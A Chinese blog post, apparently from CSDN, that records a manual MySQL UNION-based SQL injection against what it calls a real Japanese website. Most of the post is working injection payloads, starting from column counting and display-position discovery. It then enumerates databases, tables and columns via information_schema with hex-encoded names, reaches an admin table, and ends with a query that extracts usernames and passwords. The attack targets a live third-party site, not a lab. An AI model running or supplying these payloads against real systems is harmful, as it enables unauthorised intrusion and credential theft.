实战记录,日本某站

注入点 and 语句测试

and1=1 返回正常,and=2跳回首页,可能过滤了

用 ’ 测试返回错误页面

判断为注入点

order by语句查询字段数

测试字段数为9

and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9

报错联合查询语句,查询显示位

2、3为显示位

使用注入函数可爆出数据库版本信息

and 1=2 UNION SELECT 1,@@version_compile_os,3,4,5,6,7,8,9

注入函数@@version_compile_os爆出操作系统

and 1=2 UNION SELECT 1,database(),3,4,5,6,7,8,9

用注入函数database()爆出当前库

Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息

and1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9 from information_schema.SCHEMATA limit 0,1

库1

爆出第二个数据库,limit1,1即可

发现第二个数据库就是当前库

库2

and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9from information_schema.TABLES whereTABLE_SCHEMA=(库2名字16进制)limit 0,1

爆第一个表名,数据库名要转换为16进制

表1 敏感表

改为limit 1,1可爆第二个表名

表2

and 1=2 union select 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9 from information_schema.TABLES where TABLE_SCHEMA=0x68656E65636961 limit 0,1

使用group_concat(table_name)可以一次爆出全部表名

已得到敏感表名TM_ADMIN_MEMBER,接下来爆字段

表名要转换为16进制

and 1=2 union select

1,COLUMN_NAME,3,4,5,6,7,8,9 from

information_schema.COLUMNSwhere TABLE_NAME= limit 0,1

推荐使用这种方法

and 1=2 union select 1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9 from information_schema.COLUMNS where TABLE_NAME= limit 0,1

#COLUMN  翻译为  列

用 group_concat(COLUMN_NAME)函数可以一次爆出全部字段

或者可以修改limit 1,1、limit 2,1.......来一个一个爆出

敏感字段

有敏感表名,敏感字段名后就获取内容

经测试login_uid字段存放的是用户名

login_pwd存放的是密码

and 1=2 union select 1,login_uid,login_pwd,4,5,6,7,8,9 from 表名

接下来的自行脑补.......

欢迎各位大神指点批评!

晨风

mysql报错注入实战_MySQL手工注入实战相关推荐

  1. mysql 手工注入教程_mysql手工注入步骤

    1.一般用 '  "  ) 等符号来闭合,再用%23(即#)来注释后面语句. 2.查找数据库,先用order by n猜字段,再用union select 1,2,3 ...n%23来查询. ...

  2. mysql 报错跳过_mysql跳过主从同步错误

    方法一: 适用于5.5版本 mysql>slave stop; mysql>SET GLOBAL SQL_SLAVE_SKIP_COUNTER = 1 #跳过一个事务 mysql>s ...

  3. phpcms mysql 事务_phpcms某站点MySQL报错注入

    phpcms某站点MySQL报错注入 Referer可注入:GET /index.php HTTP/1.1Referer: 123*User-Agent: Mozilla/5.0 (iPhone; C ...

  4. mysql中文注入_SQL注入之Mysql报错注入

    --志向和热爱是伟大行为的双翼. 昨天偷懒了没学什么东西,先自我反省一下 - -. 今天认真的学习了一下Mysql报错注入利用方法及原理,好久之前就像认真的学一下这个了,是在上海市大学生网络安全大赛中 ...

  5. SQL注入之Mysql报错注入

    --志向和热爱是伟大行为的双翼. 昨天偷懒了没学什么东西,先自我反省一下 - -. 今天认真的学习了一下Mysql报错注入利用方法及原理,好久之前就像认真的学一下这个了,是在上海市大学生网络安全大赛中 ...

  6. 由mysql报错注入引发的探究与思考(Group by, rand函数相关,松散索引扫描、紧凑索引扫描相关)

    目录 本文要点 原理探讨(Group by, rand函数相关) 进一步的思考:索引与Group By语句 本文要点 当服务器没有关闭报错回显信息显示时,便可考虑实施报错注入类型的Mysql注入攻击. ...

  7. cmd mysql 报错_Mysql报错问题汇总

    1 远程报错问题 报错问题:Host 'XXX' is not allowed to connect to this MySQL server 1.1 防火墙允许3306端口 首先控制面板--防火墙- ...

  8. mysql table plugin,MySql报错Table mysql.plugin doesn’t exist的解决方法

    MySql报错Table mysql.plugin doesn't exist的解决方法 一般产生原因是手工更改my.ini的数据库文件存放地址导致的 mysql服务启动时候找不到内置数据库" ...

  9. Mac 使用 mysqlclient 报错 NameError: name ‘_mysql‘ is not defined

    Mac 使用 mysqlclient 报错 NameError: name '_mysql' is not defined 作者:Bright Xu Mac 安装 mysqlclient 时会报错 O ...

最新文章

  1. c语言从stdin读入
  2. fatal error LNK1112: module machine type 'x64' conflicts with target machine type 'X86'
  3. 网络推广产品浅析网站想要保持稳定的SEO排名和流量需要做什么?
  4. php websocket
  5. IDEA加载mysql 报:java.sql.SQLException: Unknown system variable ‘query_cache_size‘
  6. Navicat Premium 未保存和已执行SQL存储位置
  7. 教你消灭 Java 代码的“坏味道”
  8. c语言编译说文件不存在,c语言编译时缺少头文件,库的解决办法
  9. oracle+口令+加密算法,Oracle Password Hash
  10. xlua的hotfixManager
  11. qca9563修改art区,将2T2R修改为1T1R
  12. C# 创建基于TCP、HTTP协议的JsonRpc 2.0(可跨平台、跨语言)
  13. 原生js实现锚点定位,tab跟随内容变化,PC/移动端均适用
  14. fflush php,php fflush()函数使用实例分析
  15. java中单元测试ut怎么写_UT单元测试总结基础篇
  16. matlab:预测股票价格走势
  17. element 下拉框 el-select 自定义控制某项禁止选择
  18. 黑盒测试,白盒测试与灰盒测试的比较和区别
  19. 如何发现Synaptics病毒
  20. 冯端:漫谈物理学的过去、现在与未来

热门文章

  1. Odoo (OpenERP/TinyERP)-10.0 (Debian 8)
  2. [转载]CentOS6nbsp;快速搭建轻量级远程桌面nbsp;Xfcenb
  3. 五款常用邮件管理系统评测
  4. ‘(‘:illegal token on right side of ‘::‘
  5. Val编程-特殊函数使用
  6. C++ 多线程使用future传递异常
  7. opengl2 vtk 编译_编译和使用VTK时值得注意的点(待续)
  8. docker-compose观察实时日志_大数据项目实战之在线教育(03实时需求) - 十一vs十一...
  9. linux ubuntu bionic,尝试在Linux Ubuntu 18.04 Bionic上安装Docker CE时出现错误?
  10. Rapidmind计算库性能测试